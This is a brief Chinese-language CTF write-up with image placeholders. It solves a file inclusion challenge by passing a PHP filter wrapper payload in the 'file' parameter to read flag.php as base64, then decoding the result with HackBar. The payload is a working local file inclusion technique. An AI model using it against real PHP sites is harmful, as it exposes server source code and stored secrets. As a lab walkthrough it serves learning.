img1.png
文件包含,使用PHP伪协议读取就行
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
img2.png
使用hackbar进行base64解码得到flag
img3.png